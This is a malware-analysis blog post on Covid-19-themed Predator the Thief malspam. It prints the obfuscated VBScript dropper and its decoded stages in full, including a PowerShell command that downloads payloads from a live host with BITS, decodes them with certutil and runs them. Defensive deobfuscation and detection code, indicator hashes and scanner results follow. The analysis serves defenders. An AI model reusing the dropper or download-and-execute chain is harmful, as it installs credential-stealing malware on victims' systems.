2020-03-20 More Predator The Thief Malspam – Covid-19 Themed

Meta
=====

From: *.xyz
Subject: Various Covid-19
Attachment: covidXX_form.zip

This looks to be related to Predator the Thief malspam, based on the final script that gets executed, which looks very close to the sample I posted about over here. The zip file and VBScript can be found in my GitHub repo here.

Here is the code in the actual VBScript.

Function l(a): 
With CreateObject("Msx"+"ml2.DOMD"+"ocument").CreateElement("aux"): .DataType = "bin.base64": .Text = a: l = r(.NodeTypedValue): 
End With: 
End Function 
Function r(b): 
With CreateObject("ADODB"+".Stream"): .Type = 1: .Open: .Write b: .Position = 0: .Type = 2: .CharSet = "utf-8": r = .ReadText: .Close: 
End With: 
End function 
Execute(l("U2V0IHRlYXMgPSBHZXRPYmplY3QoIndpbm1nbXRzOlxcLlxyb290XGNpbXYyOldpbjMyX1Byb2Nlc3NTdGFydHVwIikKdGVhcy5TaG93V2luZG93ID0gMApIZWFzSmllYSA9IEdldE9iamVjdCgid2lubWdtdHM6XFwuXHJvb3RcY2ltdjI6V2luMzJfUHJvY2VzcyIpLkNyZWF0ZShTdHJSZXZlcnNlKCI9PUFBM0F3YUFVR0E0QVFhQUFDQTBCd2NBa0dBTUJBZEE0R0FsQlFiQVVIQW5CZ2NBRUVBdEFBSUFrR0F0QndOQUVEQXlCQUlBTUhBekJRWkFNR0F2QmdjQUFGQXRBQWRBSUhBaEJBZEFNRkFnQUFJQXNEQTNBd2FBVUdBNEFRYUFBQ0EwQmdlQVVHQXJCZ2FBQUNBbEJBWkE4R0FqQlFaQVFHQXRBQUlBd0dBcEJBZEFVSEEwQmdjQVVHQWpCQUlBc0RBaUFBVUEwRUFGQkFWQW9EQTJCZ2JBVUdBa0FnSUFBQ0FvQkFkQUVHQVFCUUxBQUNBdUJ3YkFrR0EwQlFZQU1HQXZCQVRBMENBMEJRWkFNRkFnQXdPQUlDQXRCd2JBTUdBdUFRZUE4RUFaQkFVQWtHQWNCQVVBMEVBRkJBVkFvREEyQmdiQVVHQWtBZ0lBd0NBaUFBZEFvSEFsQndhQW9HQWNCQVVBMEVBRkJBVkFvREEyQmdiQVVHQWtBZ0lBd0NBaUFRYkE4R0FqQmdMQWtHQXRCd05BRURBeUJBWEFBRkFOQlFSQVFGQTZBZ2RBNEdBbEJBSkFJQ0FnQWdiQThHQXBCQWRBRUdBdUJRYUFRSEF6QlFaQVFFQXRBQUlBUUhBaEJBWkE0Q0E1QndUQWtGQVFCUWFBOENBbEJBZEFrR0F6QmdZQVVHQTNCZ0xBRURBM0J3YkFnR0F6QndMQThDQTZBQWNBUUhBMEJBYUF3Q0EwQlFZQVFHQXVBQVRBRUdBNUJRWkFnRUF2QVFaQVFIQXBCd2NBSUdBbEJ3ZEE0Q0F4QXdkQThHQW9Cd2NBOENBdkFnT0FBSEEwQkFkQWdHQXNBQWRBRUdBa0JnTEFNRkFCQmdjQVVHQVBCd0xBVUdBMEJRYUFNSEFpQlFaQWNIQXVBUU1BY0hBdkJBYUFNSEF2QXdMQW9EQXdCQWRBUUhBb0JBSUFVR0FqQmdjQVVIQXZCd1VBMENBZ0FnY0FVR0FtQndjQTRHQWhCZ2NBUUZBekJBZEFrR0FDQlFMQVFIQXlCUVlBUUhBVEJBSUFzREF5QlFaQVlHQXpCZ2JBRUdBeUJBVkFNSEEwQlFhQUlFQWdBUVpBd0dBMUJBWkE4R0FOQlFMQVFIQXlCd2JBQUhBdEJRUyBlLSBsbGVoc3Jld29wIikgLCBOdWxsLCB0ZWFzLCBHZWF1ZCAp"))

And then with it decoded (first pass).

Set teas = GetObject("winmgmts:\\.\root\cimv2:Win32_ProcessStartup")
teas.ShowWindow = 0
HeasJiea = GetObject("winmgmts:\\.\root\cimv2:Win32_Process").Create(StrReverse("==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 e- llehsrewop") , Null, teas, Geaud )
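Because the three layers above are mechanical (base64 through MSXML/ADODB.Stream, then StrReverse, then the UTF-16LE base64 that powershell -e expects), each one can be peeled statically without running the script. The decoder below is an added example and is not the author's tooling or code from the repo; the function names are mine, and the sample VBScript it runs on is constructed inline with a harmless inner command rather than the page's live dropper.

```python
import base64
import re

# Constructed sample (not the page's covidXX_form.vbs): the same three layers
# as the dropper, with a harmless inner PowerShell command so the decoder can
# be exercised offline.
_INNER_PS = 'Write-Host "constructed sample"'
_INNER_B64 = base64.b64encode(_INNER_PS.encode("utf-16-le")).decode("ascii")
_REVERSED = ("powershell -e " + _INNER_B64)[::-1]
_STAGE1 = (
    'Set teas = GetObject("winmgmts:\\\\.\\root\\cimv2:Win32_ProcessStartup")\n'
    "teas.ShowWindow = 0\n"
    'HeasJiea = GetObject("winmgmts:\\\\.\\root\\cimv2:Win32_Process")'
    '.Create(StrReverse("' + _REVERSED + '") , Null, teas, Geaud )'
)
SAMPLE_VBS = (
    "Function l(a): ... End Function\n"
    'Execute(l("' + base64.b64encode(_STAGE1.encode("utf-8")).decode("ascii") + '"))'
)


def stage1_decode(vbs: str) -> str:
    """Undo l(): MSXML bin.base64 gives raw bytes, ADODB.Stream reads them as UTF-8."""
    m = re.search(r'Execute\(l\("([A-Za-z0-9+/=]+)"\)\)', vbs)
    if not m:
        raise ValueError("no Execute(l(...)) call found")
    return base64.b64decode(m.group(1)).decode("utf-8")


def stage2_commandline(stage1_script: str) -> str:
    """Undo StrReverse() to recover the Win32_Process.Create command line."""
    m = re.search(r'StrReverse\("([^"]+)"\)', stage1_script)
    if not m:
        raise ValueError("no StrReverse(...) call found")
    return m.group(1)[::-1]


# powershell -e / -ec / -enc / -EncodedCommand all take base64 of UTF-16LE text
_ENC_CMD = re.compile(
    r"(?i)powershell(?:\.exe)?\s+-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)"
)


def stage3_powershell(cmdline: str) -> str:
    """Decode the -e argument back to the PowerShell script text."""
    m = _ENC_CMD.search(cmdline)
    if not m:
        raise ValueError("no encoded PowerShell command found")
    return base64.b64decode(m.group(1)).decode("utf-16-le")


def deobfuscate(vbs: str) -> dict:
    """Run all three stages and return every intermediate for the analyst."""
    s1 = stage1_decode(vbs)
    cmd = stage2_commandline(s1)
    return {"stage1": s1, "cmdline": cmd, "powershell": stage3_powershell(cmd)}


if __name__ == "__main__":
    for name, text in deobfuscate(SAMPLE_VBS).items():
        print(f"--- {name} ---\n{text}\n")
```

Keeping every intermediate (rather than only the final script) matters for triage: the stage-2 command line is what Win32_Process.Create actually launches, so it is the string to compare against process-creation telemetry, while the stage-3 text is what to hand to the next analyst.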

Which leads to this final code being run on the system.

Import-Module BitsTransfer;
Start-BitsTransfer -Source http://show1.website/OerAS.dat,http://show1.website/HeyaL.dat,http://show1.website/iPYOy.dat -Destination "$env:TEMP\r17mi.com","$env:TEMP\jkezt","$env:TEMP\iPYOy.com";
Set-Location -Path "$env:TEMP";
certutil -decode jkezt i8ek7;
Start-Process r17mi -ArgumentList i8ek7
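The final script is a compact set of behaviours that are individually common but rarely appear together in one command line: BITS download to $env:TEMP, payloads served as .dat and written as .com, certutil -decode, and Start-Process from TEMP. One further point for detection: because the VBScript launches PowerShell through WMI's Win32_Process.Create, the parent on the endpoint is typically WmiPrvSE.exe rather than wscript.exe, so a rule keyed only on wscript.exe spawning powershell.exe will miss it. The scorer below is an added example, not the author's detection content; the indicator names, the event dict layout and the threshold are my assumptions, and the sample events are constructed, with the live host replaced by a placeholder.

```python
import re

# Behaviours from the final dropper script, each as a regex over a command line.
INDICATORS = {
    "bits_download": r"(?i)\bStart-BitsTransfer\b.*-Source\s+https?://",
    "temp_destination": r"(?i)\$env:TEMP\\",
    "certutil_decode": r"(?i)\bcertutil(?:\.exe)?\s+-decode\b",
    "start_process": r"(?i)\bStart-Process\b",
    "disguised_payload": r"(?i)https?://\S+\.dat\b",  # executables served as .dat
    "encoded_command": r"(?i)\bpowershell(?:\.exe)?\s+-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}",
}

# Script hosts plus the WMI provider host, which is the parent when
# Win32_Process.Create is used instead of a direct shell-out.
SCRIPT_HOST_PARENTS = {"wscript.exe", "cscript.exe", "wmiprvse.exe"}

# Constructed process-creation events (placeholder host, not the page's URLs).
SAMPLE_EVENTS = [
    {
        "image": "powershell.exe",
        "parent": "WmiPrvSE.exe",
        "cmdline": r'Import-Module BitsTransfer; Start-BitsTransfer -Source '
                   r'http://downloader.invalid/a.dat,http://downloader.invalid/b.dat '
                   r'-Destination "$env:TEMP\stage.com","$env:TEMP\blob"; '
                   r'Set-Location -Path "$env:TEMP"; certutil -decode blob decoded; '
                   r'Start-Process stage -ArgumentList decoded',
    },
    {
        "image": "powershell.exe",
        "parent": "explorer.exe",
        "cmdline": r'Get-ChildItem "$env:TEMP" | Measure-Object',
    },
    {
        "image": "powershell.exe",
        "parent": "wscript.exe",
        "cmdline": r"powershell.exe -NoProfile -Command Get-Date",
    },
]


def score_event(event: dict) -> list:
    """Return the names of every indicator the event matches."""
    hits = [name for name, pat in INDICATORS.items() if re.search(pat, event["cmdline"])]
    if event["image"].lower() == "powershell.exe" and event["parent"].lower() in SCRIPT_HOST_PARENTS:
        hits.append("script_host_parent")
    return hits


def triage(events: list, threshold: int = 3) -> list:
    """Keep only events whose indicator count reaches the threshold (assumed value)."""
    flagged = []
    for i, ev in enumerate(events):
        hits = score_event(ev)
        if len(hits) >= threshold:
            flagged.append({"index": i, "parent": ev["parent"], "hits": hits})
    return flagged


if __name__ == "__main__":
    for row in triage(SAMPLE_EVENTS):
        print(row)
```

The threshold keeps the single-indicator cases (an admin using certutil, a PowerShell child of a script host for legitimate automation) out of the alert queue while the full chain, which trips five or six indicators at once, is flagged regardless of which host the binaries are fetched from.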

Reference
==========

http://urlhaus.abuse.ch/browse.php?search=show1.website
http://malshare.com/search.php?query=d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c
http://bazaar.abuse.ch/browse.php?search=d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c
http://app.any.run/tasks/8f771d9c-355f-4262-bac0-0a1927f52222/
http://gchq.github.io/CyberChef/#recipe=Reverse('Character')From_Base64('A-Za-z0-9%2B/%3D',true)Remove_null_bytes()&input=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

Artifacts
==========

Email hashes
------------
182a2cc132f77bacda747c8b36ae82d807e5a3cee01c734deb29f2598b992918 —— ahpwzh909165720504.eml
b23c073099a90b2d42c12c05ed86b09fc8ca563b044a411db55a066ce717cb69 —— amenfj107683720503.eml
8758c35198dd93fcdd5558e4b02cf42b00d7db7a89b29696ff43e9b5a652b452 —— aqjhih486051720509.eml
727872132b70153b261a32a32549ab3015b2074a880d6c80910d61750f11b009 —— bectoa324586720508.eml
2982d7c460629631ae2145580140d26402efc27baa75efb07e63aed50a11607a —— bgnlhx068677720507.eml
fa9961b389fbc4bab3554d5ba3e5f3b876504e691209d6391d5c8d52f698089f —— bwshti965590720502.eml
87da0ff125413aa5dac4b237e8442c871e4e9020a846f09a6d2739fe3b35042c —— cilevz072352720503.eml
1bff3d0e786f66cd47a4480e25a683ca7eec18138c0d2254d8f9c88138e156b3 —— ckvpia223121720509.eml
312630c0affd465e3ce6b54da78685dd637494eca9240f9693c2c17a764ce5db —— cqihll893721720502.eml
9a732aaacbce30c3a65048c34a11b1e2869a8d7515949145cfbb4360ebd0e4e2 —— dljwob279691720509.eml
a924cc0373bc5f5ed01c02cb8929c2747755fe63b5a86913bcdf7e477630a74e —— dvfqtv681383720509.eml
cbc9322e6da2a67a70a1c27ad321e1cbc42df5af811350f647eba164b50244de —— dwabmh152144720507.eml
9408662823842ed16a1e6f6c622382784d436c61907c284458a3a5c88d02da31 —— emoivy091449720505.eml
ac9962a6b532edb050d319197087ae491d969eb570e5b26d19ba06938be7d11d —— faphdx143744720503.eml
f80611ed48c8f7236ce774d93f932a44f7d483daa545e72463ecf541a31f9dd6 —— gqucfs999396720505.eml
fde4a39ec21c2511cb79fc58049bfeb4f3404a9bf96bcb0afa7de758ee38af3a —— gsckqv038756720508.eml
9b164b3ef7fa34d525b30da95f1ea8cd13aa350383619f3f7c261abebdccc5ad —— helhmv035088720506.eml
4168564de21589597ff90de1ed9ac8f9b071515b35873c59b618b3ab2ddcbcc8 —— ifarbb447866720509.eml
5a2a46ef8ca3c0e6920caa0e8dce50e9f479cd821ed0b1cc52c0e31fbc4db4b4 —— ivdinf970396720504.eml
fc872d847b1ee53d9974ba86114f3cd5c2ace0304d5824da2d936dfadc52f0d3 —— kginyn613097720509.eml
be07c28cb8489517031b6608cf1e6ae96f730fe3fca53f372a60a0cf609f61a1 —— khskmd054398720505.eml
2f8f21ca9d9a91f5bb0d8d520a18d15238c30c23dcf19da0870c66018ab9b089 —— lewyfh359586720509.eml
59a3448589fd10566cd3ff7b99206b0ae3bc5508636d971f28bca5f89de24203 —— llnbng258644720508.eml
93047698e9f054913f24c7ff17a2a46eb2a420d1e4b2df66f8128a1c9b624119 —— lonbxj929511720502.eml
b077fdd83c940f1ee0d90c290cc45ba669f6ce5444d11bbaf5838487e4a8c6f3 —— lzfzyu646540720509.eml
18b2757cb8bc85d67612426561e0e421bb9cac6dc3537cc186c9c005d68e1a00 —— miwgbo082364720506.eml
f3ff0b220ecee663b4f04ab3d763c4d2c7f03ae2c7d17dd19ce19ce17740b5ca —— mqefkj109159720507.eml
1a14439b54ab74d5de7a7dc336d27fc820c660934a4d2a634d155d54d2262eab —— nghtpw022081720507.eml
3d27775288fae409d1a6c3d63712c6990d51c2eb9368c8e36394fbc0e43f8f56 —— nnlmhy001515720503.eml
5fb4a5cb963984a3fbc7e8f084189e1da9ead15097b0d0d436a026c035452584 —— nnynjh213509720506.eml
3af0739f1e2707d2fb763de2cb81c66a666fb230ec654c94fe57d15438cde0c4 —— onctnr950551720507.eml
98a967858c2c96dd78df404220e6501ab7203ccbdba1da8c0c57c7ac982f2cdc —— ooxcnt317569720509.eml
ae4a016ce43b45fffc6c56abf5ae7711ecec60d025862ac75c1f02e0ed7393e2 —— oskvef181932720503.eml
313a15dc929ca1f01339e1cfd7d08454d138ee124862755a63abcf207b20bb43 —— qlryhj128390720505.eml
342d7aa503394d38922eec3099266e92b3b15f02d1099d4e7c7b23728e30b4b1 —— raliuz217617720503.eml
239322bfe9df50e2bb4c82e02be8937ecae1f4f2ba7376d167340ecca3a53af3 —— rffkmr935458720505.eml
b0d15c2a44d749efce5022bcb437bc3bb9efc79ac2bab099c75a8b9b2125b07a —— rghcly404847720509.eml
8e2d0a24adb8e8b3077bf75aed01b897cc0b317d50aaf927772fb22c18b1ebea —— txbsnn206432720508.eml
ee079262af4424f01b5624815301e16bcf1083ec88874a06a45a945e86b408b3 —— uudqvw036913720503.eml
1ab01426f338f727814d3fb20a8dcfbde40da580a5b060fc8e840288573159c4 —— vdhaur167510720505.eml
5a474c4ae2715a300c6a4f88a5be448d9ce16931d2cd52f8ba47fd66155fd2f1 —— wmfgiu574933720509.eml
19abaf70f1f6cbb424b9e100616097f96d40a6462eeec0358e9518f5c4a9a1ef —— wumwvg372999720508.eml
baa6d1cb5fdd13cfbccf3a533a5f5c9f4148d9a3e65cc6248109f78b4403b226 —— xuxuqj527923720509.eml
eadee2ef4f229e1a201d1852f1ed034642dff680715c314d4583005b90c61f0b —— ymgomi173864720506.eml
7f34f1ae28926fd7165defd06efad7e3b3d9c47807858750afe46efaafc7dfeb —— ynjkty089546720508.eml
a249e898c675690e11d71b90292cbec89fe6fa1d75257ad4b8e6dd60fd021d24 —— zdjppk015535720505.eml
0e734d7344ca7be03122a0e6f826dcfc77fd8cf2ddd673b2fd4b3c7c3a325a1c —— zntqsb424056720508.eml

File hashes
-----------

5fc61f88a7f47073c24ddf33237846bba8d8a27124116e23c362bc35e77ca0f5 —— covid21_form.zip
f8620dd6b8fc37fba432728341961a4441ed929ff16cb3f70b80244d70768d7f —— covid22_form.zip
0dae5e8e259576a05d87faec63e382f21dc2f2888c82a05b763aa10585bbdda1 —— covid23_form.zip
394f653cc7ef4e3d1cc0217bc940b1efabcba7d22662c0d298536f8402a54b58 —— covid24_form.zip
14dcc393d3fee5971220634f291bba5776614b9c39c6c6e8da782e79766f8855 —— covid26_form.zip
754b8ece7f7f28b1170ca143e45c133f5977add875a2310c1da62b7c884ebbb2 —— covid27_form.zip
125575ead5f5ed3c524c7012b89da3741cc0b365e6214ae501a2d056ea1b8d9b —— covid28_form.zip
3f0ce0501a74811d8ef6f314d4bfdf34d8204ecc90b296ca19c4a5a20ab8f5d0 —— covid30_form.zip
436672d96a9c9f1216de032cbf34d0a1b1eb86e3f1e903631d6df3994a460566 —— covid31_form.zip
d9db96ab59eaab31009d5facc359e3bc6e915cd6558e339cd94b6c407b3934be —— covid32_form.zip
1ebfff4292722a5e785adfb5f86f8c99302f915e6a40dd166de3162ad252bc58 —— covid34_form.zip
ccc9b3ce71b082c0e81dc8acb8ddbb8d4aa66dfebf3377ca3f2d5d0e47007b3b —— covid35_form.zip
273ec7da73a29a99e0e28142e3d9fe80e297a06fe18e32a6537913453bfd1652 —— covid38_form.zip
f9201a2787ec144b0638e22744a074ef168084f94123d1cd8f25f42ef10b7a57 —— covid39_form.zip
bc27f858d9ad61c36b95a232e506476de8ebdd85eb712bcbf6b045fbb1c340eb —— covid41_form.zip
e9fb57f7f5286e07ef704bac0ddeb098542ee3229a03220a0b7677daf177bf7e —— covid42_form.zip
8fac412bdd6401a0f1d178a023e3c2d128d35cfec500ef194b2f4872b561a6b7 —— covid43_form.zip
a2a062cdfad00e93b8fd83887d1b12f446312aa3f990bc43e3addc8254983f34 —— covid44_form.zip
dfdbe5ff6d5ea17ff3ed0b521a0ea6c4b2c95e4702ba4725ff006d507cfc3504 —— covid45_form.zip
e5187acd91e48b18e68ef63093d0368c3a6f24527160d42089071edf5e69139d —— covid46_form.zip
03a8a1e0c5e0ecf7c51ca10ffe1bf1428606df7b8c3e4ab6df313f074ef992e9 —— covid47_form.zip
5400e9d4de9cefac60ac1b05608e53ee14a1579f1835762cf56f01c9e925abbc —— covid49_form.zip
a29afb545040a7c5f67bad6e03614a5e346c99fd2d851285fc5c2e2f80c380ff —— covid50_form.zip
b374c87ae852aa0443eb541f7d4ef4017c4238b10155381b88bb05016caab445 —— covid51_form.zip
15f3dae3f977165267156bbd90fcb9e1dd8dc92ae5247b5621b3ce0439b89d1e —— covid53_form.zip

d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid21_form.vbs
d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid22_form.vbs
d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid23_form.vbs
d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid24_form.vbs
d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid26_form.vbs
d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid27_form.vbs
d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid28_form.vbs
d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid30_form.vbs
d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid31_form.vbs
d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid32_form.vbs
d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid34_form.vbs
d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid35_form.vbs
d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid38_form.vbs
d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid39_form.vbs
d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid41_form.vbs
d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid42_form.vbs
d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid43_form.vbs
d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid44_form.vbs
d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid45_form.vbs
d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid46_form.vbs
d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid47_form.vbs
d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid49_form.vbs
d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid50_form.vbs
d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid51_form.vbs
d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c —— covid53_form.vbs

Machinae results
----------------

File names: covid21_form.zip, covid21_form.vbs
[.] Requesting http://www.virustotal.com/vtapi/v2/file/report?apikey=XXX&resource=5fc61f88a7f47073c24ddf33237846bba8d8a27124116e23c362bc35e77ca0f5 (GET)
[.] Requesting http://www.virustotal.com/vtapi/v2/file/report?apikey=XXX&resource=d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c (GET)
********************************************************************************
* Information for 5fc61f88a7f47073c24ddf33237846bba8d8a27124116e23c362bc35e77ca0f5
* Observable type: hash.sha256 (Auto-detected: True)
********************************************************************************
Not seeing what you expect? Likely not a valid site. Try running with --list-sites

[+] VirusTotal File Report Results
[-] Date submitted: 2020-03-20 17:30:07
[-] Detected engines: 2
[-] Total engines: 63
[-] Scans: ('Arcabit', 'HEUR[.]Arch[.]Script.A')
[-] Scans: ('Qihoo-360', 'virus[.]vbs[.]qexvmc.1085')
********************************************************************************
* Information for d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c
* Observable type: hash.sha256 (Auto-detected: True)
********************************************************************************
Not seeing what you expect? Likely not a valid site. Try running with --list-sites

[+] VirusTotal File Report Results
[-] Date submitted: 2020-03-20 17:22:46
[-] Detected engines: 3
[-] Total engines: 59
[-] Scans: ('Microsoft', 'TrojanDownloader:VBS/Nemucod!MTB')
[-] Scans: ('ZoneAlarm', 'UDS:DangerousObject[.]Multi[.]Generic')
[-] Scans: ('Qihoo-360', 'virus[.]vbs[.]qexvmc.1085')

Munin results
-------------

1 / 2 > Suspicious
HASH: d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c COMMENT: covid21_form.vbs
VIRUS: Microsoft: TrojanDownloader:VBS/Nemucod!MTB
TYPE: Text SIZE: 1.77 KB FILENAMES: covid22_form.vbs, covid22_form.vbs
FIRST: 2020-03-20 14:23:16 LAST: 2020-03-20 17:30:04 SUBMISSIONS: 1 REPUTATION: 0
COMMENTS: 0 USERS: – TAGS: TEXT
RESULT: 3 / 58
[!] Sample on ANY.RUN URL: http://any.run/report/d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c

2 / 2 > Suspicious
HASH: 5fc61f88a7f47073c24ddf33237846bba8d8a27124116e23c362bc35e77ca0f5 COMMENT: covid21_form.zip
TYPE: ZIP SIZE: 1.22 KB FILENAMES: covid21_form.zip, covid21_form.zip
FIRST: 2020-03-20 14:11:51 LAST: 2020-03-20 17:30:07 SUBMISSIONS: 1 REPUTATION: 0
COMMENTS: 0 USERS: – TAGS: ZIP
RESULT: 2 / 63
